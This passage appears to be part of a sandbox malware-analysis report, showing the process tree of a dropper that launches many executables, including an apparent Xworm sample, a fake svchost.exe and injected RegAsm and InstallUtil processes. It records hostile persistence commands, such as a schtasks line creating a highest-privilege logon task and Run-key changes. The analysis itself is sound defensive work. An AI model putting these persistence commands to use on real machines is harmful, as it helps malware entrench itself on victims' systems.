      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11840
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11848
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11856
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11864
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11872
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11880
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11888
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11896
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11904
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11912
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11920
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11928
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11936
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11944
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11952
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11960
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11968
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11976
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11984
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11992
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12000
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12008
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12016
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12024
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12032
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12040
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12048
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12056
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12064
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12072
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12080
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12088
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12100
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12108
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12116
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12124
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12132
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12140
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12148
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12156
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12164
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12172
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12180
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12188
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12196
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12204
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12212
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12220
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12228
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12236
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12244
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12252
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12268
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12276
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12284
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12096
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12292
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12300
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12308
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12316
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12324
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12332
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12340
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12348
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12356
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12364
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12372
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12380
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12388
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12396
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12404
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12412
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12420
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12428
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12436
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12444
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12452
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12460
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12468
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12476
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12484
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12492
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12500
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12508
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12516
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12524
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12532
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12540
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12548
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12556
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12564
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12572
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12580
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12588
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12596
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12604
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12612
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12620
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12628
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12636
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12644
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12652
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12660
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12668
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12676
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12684
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12692
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12700
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12708
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12716
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12724
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12732
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12740
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12748
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12756
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12764
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12772
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12780
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12788
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12796
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12804
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12812
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12820
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12828
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12836
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12844
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12856
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12864
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12872
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12880
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12888
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12896
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12904
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12912
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12920
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12928
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12936
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12944
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12952
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12960
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12968
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12976
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12984
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:12992
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13000
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13008
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13016
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13024
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13032
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13040
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13048
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13056
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13064
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:13072
- C:\Users\Admin\Desktop\4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
  2⤵
  PID:3000
- - C:\Users\Admin\Desktop\Files\langla.exe
    "C:\Users\Admin\Desktop\Files\langla.exe"
    3⤵
    - Executes dropped EXE
    PID:568
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:5100
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3051.tmp.bat""
      4⤵
      PID:4392
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2724
    - - C:\Users\Admin\AppData\Roaming\http.exe
        
        "C:\Users\Admin\AppData\Roaming\http.exe"
        5⤵
        Executes dropped EXE
        
        PID:4668
- - C:\Users\Admin\Desktop\Files\o.exe
    "C:\Users\Admin\Desktop\Files\o.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2732
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      PID:4848
    - - C:\Users\Admin\AppData\Local\Temp\149518748.exe
        
        C:\Users\Admin\AppData\Local\Temp\149518748.exe
        5⤵
        Executes dropped EXE
        
        PID:2656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:4428
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:1216
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:2068
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:1396
    - - C:\Users\Admin\AppData\Local\Temp\106579757.exe
        
        C:\Users\Admin\AppData\Local\Temp\106579757.exe
        5⤵
        Executes dropped EXE
        
        PID:4852
      - C:\Users\Admin\AppData\Local\Temp\1639833351.exe
        
        C:\Users\Admin\AppData\Local\Temp\1639833351.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        
        PID:3900
    - - C:\Users\Admin\AppData\Local\Temp\2230932668.exe
        
        C:\Users\Admin\AppData\Local\Temp\2230932668.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4896
    - - C:\Users\Admin\AppData\Local\Temp\646121280.exe
        
        C:\Users\Admin\AppData\Local\Temp\646121280.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1680
    - - C:\Users\Admin\AppData\Local\Temp\2896510401.exe
        
        C:\Users\Admin\AppData\Local\Temp\2896510401.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5288
      - C:\Users\Admin\AppData\Local\Temp\1079137770.exe
        
        C:\Users\Admin\AppData\Local\Temp\1079137770.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4408
- - C:\Users\Admin\Desktop\Files\1_encoded.exe
    "C:\Users\Admin\Desktop\Files\1_encoded.exe"
    3⤵
    - Executes dropped EXE
    PID:3432
- - C:\Users\Admin\Desktop\Files\ufw.exe
    "C:\Users\Admin\Desktop\Files\ufw.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2992
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1768
- - C:\Users\Admin\Desktop\Files\Setup2.exe
    "C:\Users\Admin\Desktop\Files\Setup2.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:1844
- - C:\Users\Admin\Desktop\Files\cock.exe
    "C:\Users\Admin\Desktop\Files\cock.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2240
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:4448
- - C:\Users\Admin\Desktop\Files\ee.exe
    "C:\Users\Admin\Desktop\Files\ee.exe"
    3⤵
    - Executes dropped EXE
    PID:4276
- - C:\Users\Admin\Desktop\Files\svchost.exe
    "C:\Users\Admin\Desktop\Files\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:5332
- - C:\Users\Admin\Desktop\Files\Xworm%20V5.6.exe
    "C:\Users\Admin\Desktop\Files\Xworm%20V5.6.exe"
    3⤵
    - Executes dropped EXE
    PID:6076
- - C:\Users\Admin\Desktop\Files\tpeinf.exe
    "C:\Users\Admin\Desktop\Files\tpeinf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\1522032729.exe
      C:\Users\Admin\AppData\Local\Temp\1522032729.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2296
- - C:\Users\Admin\Desktop\Files\safman_setup.exe
    "C:\Users\Admin\Desktop\Files\safman_setup.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3308
  - - C:\Users\Admin\AppData\Local\Temp\is-4FS0A.tmp\safman_setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-4FS0A.tmp\safman_setup.tmp" /SL5="$40494,7676943,67584,C:\Users\Admin\Desktop\Files\safman_setup.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5628
    - - C:\SAF\SAFMan\safman.exe
        
        "C:\SAF\SAFMan\safman.exe"
        5⤵
